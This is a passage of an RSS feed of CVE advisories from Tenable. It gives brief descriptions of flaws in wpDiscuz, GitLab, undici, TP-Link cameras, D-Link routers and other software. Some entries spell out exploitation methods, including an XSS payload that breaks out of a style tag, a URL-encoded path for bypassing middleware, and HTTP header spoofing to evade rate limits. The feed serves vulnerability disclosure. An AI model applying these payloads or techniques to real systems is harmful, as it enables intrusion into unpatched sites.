      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains a cross-site scripting vulnerability that allows attackers to inject malicious code through unescaped attachment URLs in HTML output by exploiting the WpdiscuzHelperUpload class. Attackers can craft malicious attachment records or filter hooks to inject arbitrary JavaScript into img and anchor tag attributes, executing code in the context of WordPress users viewing comments.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22210">https://www.tenable.com/cve/CVE-2026-22210</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22209]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22209</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22209</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:11 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains a cross-site scripting vulnerability in the customCss field that allows administrators to inject malicious scripts by breaking out of style tags. Attackers with admin access can inject payloads like `&lt;/style&gt;&lt;script&gt;alert(1)&lt;/script&gt;` in the custom CSS setting to execute arbitrary JavaScript in user browsers.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22209">https://www.tenable.com/cve/CVE-2026-22209</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22204]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22204</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22204</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:10 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains an email header injection vulnerability that allows attackers to manipulate mail recipients by injecting malicious data into the comment_author_email cookie. Attackers can craft a malicious cookie value that, when processed through urldecode() and passed to wp_mail() functions, enables header injection to alter email recipients or inject additional headers.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22204">https://www.tenable.com/cve/CVE-2026-22204</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22203]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22203</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22203</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:10 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains an information disclosure vulnerability that allows administrators to inadvertently expose OAuth secrets by exporting plugin options as JSON. Attackers can obtain exported files containing plaintext API secrets like fbAppSecret, googleClientSecret, twitterAppSecret, and other social login credentials from support tickets, backups, or version control repositories.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22203">https://www.tenable.com/cve/CVE-2026-22203</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22202]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22202</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22202</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:10 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains a cross-site request forgery vulnerability that allows attackers to delete all comments associated with an email address by crafting a malicious GET request with a valid HMAC key. Attackers can embed the deletecomments action URL in image tags or other resources to trigger permanent deletion of comments without user confirmation or POST-based CSRF protection.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22202">https://www.tenable.com/cve/CVE-2026-22202</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22201]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22201</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22201</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:10 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains an IP spoofing vulnerability in the getIP() function that allows attackers to bypass IP-based rate limiting and ban enforcement by trusting untrusted HTTP headers. Attackers can set HTTP_CLIENT_IP or HTTP_X_FORWARDED_FOR headers to spoof their IP address and circumvent security controls.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22201">https://www.tenable.com/cve/CVE-2026-22201</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22199]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22199</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22199</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:09 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains a vote manipulation vulnerability that allows attackers to manipulate comment votes by obtaining fresh nonces and bypassing rate limiting through client-controlled headers. Attackers can vary User-Agent headers to reset rate limits, request nonces from the unauthenticated wpdGetNonce endpoint, and vote multiple times using IP rotation or reverse proxy header manipulation.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22199">https://www.tenable.com/cve/CVE-2026-22199</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22193]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22193</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22193</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:09 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains an SQL injection vulnerability in the getAllSubscriptions() function where string parameters lack proper quote escaping in SQL queries. Attackers can inject malicious SQL code through email, activation_key, subscription_date, and imported_from parameters to manipulate database queries and extract sensitive information.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22193">https://www.tenable.com/cve/CVE-2026-22193</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22192]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22192</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22192</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:09 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by importing a crafted options file with unescaped customCss field values. Attackers can supply a malicious JSON import file containing script payloads in the customCss parameter that execute on every page when rendered through the options handler without proper sanitization.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22192">https://www.tenable.com/cve/CVE-2026-22192</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22191]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22191</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22191</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:09 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains a shortcode injection vulnerability that allows attackers to execute arbitrary shortcodes by including them in comment content sent via email notifications. Attackers can inject shortcodes like [contact-form-7] or [user_meta] in comments, which are executed server-side when the WpdiscuzHelperEmail class processes notifications through do_shortcode() before wp_mail().</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22191">https://www.tenable.com/cve/CVE-2026-22191</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22183]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22183</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22183</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:07 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains a stored cross-site scripting vulnerability in the inline comment preview functionality that allows authenticated users to inject malicious scripts by submitting comments with unescaped content. Attackers with unfiltered_html capabilities can inject JavaScript directly through comment content rendered in the AJAX response from the getLastInlineComments() function in class.WpdiscuzHelperAjax.php without proper HTML escaping.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22183">https://www.tenable.com/cve/CVE-2026-22183</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22182]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22182</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22182</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:07 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains an unauthenticated denial of service vulnerability that allows anonymous users to trigger mass notification emails by exploiting the checkNotificationType() function. Attackers can repeatedly call the wpdiscuz-ajax.php endpoint with arbitrary postId and comment_id parameters to flood subscribers with notifications, as the handler lacks nonce verification, authentication checks, and rate limiting.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22182">https://www.tenable.com/cve/CVE-2026-22182</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22052]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22052</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22052</guid>
            <pubDate>Thu, 05 Mar 2026 00:15:56 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>ONTAP versions 9.12.1 and higher with S3 NAS buckets are susceptible to an information disclosure vulnerability. Successful exploitation could allow an authenticated attacker to view a listing of the contents in a directory for which they lack permission.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22052">https://www.tenable.com/cve/CVE-2026-22052</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22031]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22031</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22031</guid>
            <pubDate>Mon, 19 Jan 2026 16:15:54 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>@fastify/middie is the plugin that adds middleware support on steroids to Fastify. A security vulnerability exists in @fastify/middie prior to version 9.1.0 where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints. Version 9.1.0 fixes the issue.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22031">https://www.tenable.com/cve/CVE-2026-22031</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-21628]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-21628</link>
            <guid>https://www.tenable.com/cve/CVE-2026-21628</guid>
            <pubDate>Thu, 05 Mar 2026 10:15:57 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>An improperly secured file management feature allows uploads of dangerous data types for unauthenticated users, leading to remote code execution.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-21628">https://www.tenable.com/cve/CVE-2026-21628</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-21262]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-21262</link>
            <guid>https://www.tenable.com/cve/CVE-2026-21262</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:06 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-21262">https://www.tenable.com/cve/CVE-2026-21262</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-20967]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-20967</link>
            <guid>https://www.tenable.com/cve/CVE-2026-20967</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:05 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper input validation in System Center Operations Manager allows an authorized attacker to elevate privileges over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-20967">https://www.tenable.com/cve/CVE-2026-20967</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1732]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1732</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1732</guid>
            <pubDate>Wed, 11 Mar 2026 16:16:22 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.6 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user to disclose confidential issue titles due to improper filtering under certain circumstances.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1732">https://www.tenable.com/cve/CVE-2026-1732</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1704]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1704</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1704</guid>
            <pubDate>Fri, 13 Mar 2026 19:53:58 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.9.29. This is due to the `get_item_permissions_check` method granting access to users with the `ssa_manage_appointments` capability without validating staff ownership of the requested appointment. This makes it possible for authenticated attackers, with custom-level access and above (users granted the ssa_manage_appointments capability, such as Team Members), to view appointment records belonging to other staff members and access sensitive customer personally identifiable information via the appointment ID parameter.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1704">https://www.tenable.com/cve/CVE-2026-1704</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1668]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1668</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1668</guid>
            <pubDate>Fri, 13 Mar 2026 19:53:58 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>The web interface on multiple Omada switches does not adequately validate certain external inputs, which may lead to out-of-bounds memory access when processing crafted requests. Under specific conditions, this flaw may result in unintended command execution.<br>An unauthenticated attacker with network access to the affected interface may cause memory corruption, service instability, or information disclosure. Successful exploitation may allow remote code execution or denial-of-service.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1668">https://www.tenable.com/cve/CVE-2026-1668</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1663]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1663</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1663</guid>
            <pubDate>Wed, 11 Mar 2026 16:16:22 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 14.4 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user with group import permissions to create labels in private projects due to improper authorization validation in the group import process under certain circumstances.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1663">https://www.tenable.com/cve/CVE-2026-1663</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1528]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1528</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1528</guid>
            <pubDate>Thu, 12 Mar 2026 21:16:25 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Impact: A server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process.<br>Patches: Patched in undici versions v7.24.0 and v6.24.0. Users should upgrade to these versions or later.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1528">https://www.tenable.com/cve/CVE-2026-1528</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1527]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1527</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1527</guid>
            <pubDate>Thu, 12 Mar 2026 21:16:25 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Impact: When an application passes user-controlled input to the upgrade option of client.request(), an attacker can inject CRLF sequences (\r\n) to:<br>* Inject arbitrary HTTP headers<br>* Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch)<br>The vulnerability exists because undici writes the upgrade value directly to the socket without validating for invalid header characters:<br>// lib/dispatcher/client-h1.js:1121<br>if (upgrade) { header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` }</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1527">https://www.tenable.com/cve/CVE-2026-1527</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1526]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1526</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1526</guid>
            <pubDate>Thu, 12 Mar 2026 21:16:23 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>The undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a "decompression bomb") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive. The vulnerability exists in the PerMessageDeflate.decompress() method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1526">https://www.tenable.com/cve/CVE-2026-1526</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1182]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1182</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1182</guid>
            <pubDate>Thu, 12 Mar 2026 02:15:58 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 8.14 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user to gain unauthorized access to confidential issue titles created in public projects under certain circumstances.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1182">https://www.tenable.com/cve/CVE-2026-1182</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1090]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1090</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1090</guid>
            <pubDate>Wed, 11 Mar 2026 16:16:22 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.6 before 18.7.6, 18.8 before 18.8.6, and 18.9 before 18.9.2 that could have allowed an authenticated user, when the `markdown_placeholders` feature flag was enabled, to inject JavaScript in a browser due to improper sanitization of placeholder content in markdown processing.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1090">https://www.tenable.com/cve/CVE-2026-1090</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-1069]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-1069</link>
            <guid>https://www.tenable.com/cve/CVE-2026-1069</guid>
            <pubDate>Wed, 11 Mar 2026 16:16:22 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.9 before 18.9.2 that could have allowed an unauthenticated user to cause a denial of service by sending specially crafted GraphQL requests due to uncontrolled recursion under certain circumstances.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-1069">https://www.tenable.com/cve/CVE-2026-1069</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-0957]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-0957</link>
            <guid>https://www.tenable.com/cve/CVE-2026-0957</guid>
            <pubDate>Fri, 13 Mar 2026 19:53:57 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted file in Digilent DASYLab. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted file. This vulnerability affects all versions of Digilent DASYLab.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-0957">https://www.tenable.com/cve/CVE-2026-0957</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-0956]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-0956</link>
            <guid>https://www.tenable.com/cve/CVE-2026-0956</guid>
            <pubDate>Fri, 13 Mar 2026 19:53:57 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>There is a memory corruption vulnerability due to an out-of-bounds read when loading a corrupted file in Digilent DASYLab. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted file. This vulnerability affects all versions of Digilent DASYLab.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-0956">https://www.tenable.com/cve/CVE-2026-0956</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-0955]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-0955</link>
            <guid>https://www.tenable.com/cve/CVE-2026-0955</guid>
            <pubDate>Fri, 13 Mar 2026 19:53:57 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>There is a memory corruption vulnerability due to an out-of-bounds read when loading a corrupted file in Digilent DASYLab. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted file. This vulnerability affects all versions of Digilent DASYLab.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-0955">https://www.tenable.com/cve/CVE-2026-0955</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-0954]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-0954</link>
            <guid>https://www.tenable.com/cve/CVE-2026-0954</guid>
            <pubDate>Fri, 13 Mar 2026 19:53:57 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted DSB file in Digilent DASYLab. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file. This vulnerability affects all versions of Digilent DASYLab.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-0954">https://www.tenable.com/cve/CVE-2026-0954</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-0835]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-0835</link>
            <guid>https://www.tenable.com/cve/CVE-2026-0835</guid>
            <pubDate>Fri, 13 Mar 2026 19:53:56 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.1.0.0 through 6.1.2.7_2, 6.2.0.0 through 6.2.0.5_1, 6.2.1.0 through 6.2.1.1_1, and 6.2.2.0 are vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-0835">https://www.tenable.com/cve/CVE-2026-0835</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-0653]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-0653</link>
            <guid>https://www.tenable.com/cve/CVE-2026-0653</guid>
            <pubDate>Tue, 10 Feb 2026 18:16:22 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>On TP-Link Tapo C260 v1 and D235 v1, a guest-level authenticated user can bypass intended access restrictions by sending crafted requests to a synchronization endpoint. This allows modification of protected device settings despite limited privileges. An attacker may change sensitive configuration parameters without authorization, resulting in unauthorized device state manipulation but not full code execution.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-0653">https://www.tenable.com/cve/CVE-2026-0653</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-0651]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-0651</link>
            <guid>https://www.tenable.com/cve/CVE-2026-0651</guid>
            <pubDate>Tue, 10 Feb 2026 18:16:21 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>On TP-Link Tapo C260 v1 and D235 v1, path traversal is possible due to improper handling of specific GET request paths via https, allowing local unauthenticated probing of filesystem paths. An attacker on the local network can determine whether certain files exist on the device, with no read, write or code execution possibilities.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-0651">https://www.tenable.com/cve/CVE-2026-0651</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-8766]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-8766</link>
            <guid>https://www.tenable.com/cve/CVE-2025-8766</guid>
            <pubDate>Fri, 13 Mar 2026 19:53:56 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>A container privilege escalation flaw was found in certain Multi-Cloud Object Gateway Core images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-8766">https://www.tenable.com/cve/CVE-2025-8766</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-71263]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-71263</link>
            <guid>https://www.tenable.com/cve/CVE-2025-71263</guid>
            <pubDate>Fri, 13 Mar 2026 19:53:53 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>In UNIX Fourth Research Edition (v4), the su command is vulnerable to a buffer overflow due to the 'password' variable having a fixed size of 100 bytes. A local user can exploit this to gain root privileges. It is unlikely that UNIX v4 is running anywhere outside of a very small number of lab environments.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-71263">https://www.tenable.com/cve/CVE-2025-71263</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-70245]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-70245</link>
            <guid>https://www.tenable.com/cve/CVE-2025-70245</guid>
            <pubDate>Thu, 12 Mar 2026 19:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Stack buffer overflow vulnerability in D-Link DIR-513 v1.10 via the curTime parameter to goform/formSetWizardSelectMode.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-70245">https://www.tenable.com/cve/CVE-2025-70245</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-70060]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-70060</link>
            <guid>https://www.tenable.com/cve/CVE-2025-70060</guid>
            <pubDate>Mon, 09 Mar 2026 16:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in YMFE yapi v1.12.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-70060">https://www.tenable.com/cve/CVE-2025-70060</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-70059]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-70059</link>
            <guid>https://www.tenable.com/cve/CVE-2025-70059</guid>
            <pubDate>Mon, 09 Mar 2026 15:15:52 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>An issue pertaining to CWE-400: Uncontrolled Resource Consumption was discovered in YMFE yapi v1.12.0 and allows attackers to cause a denial of service.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-70059">https://www.tenable.com/cve/CVE-2025-70059</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-70050]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-70050</link>
            <guid>https://www.tenable.com/cve/CVE-2025-70050</guid>
            <pubDate>Mon, 09 Mar 2026 16:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>An issue pertaining to CWE-312: Cleartext Storage of Sensitive Information was discovered in lesspass lesspass v9.6.9 which allows attackers to obtain sensitive information.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2025-70050">https://www.tenable.com/cve/CVE-2025-70050</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2025-70048]]></title>
            <link>https://www.tenable.com/cve/CVE-2025-70048</link>
            <guid>https://www.tenable.com/cve/CVE-2025-70048</guid>
            <pubDate>Mon, 09 Mar 2026 16:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>An issue pertaining to CWE-319: Cleartext Transmission of Sensitive Information was discovered in Nexusoft NexusInterface v3.2.0-beta.2.</p>

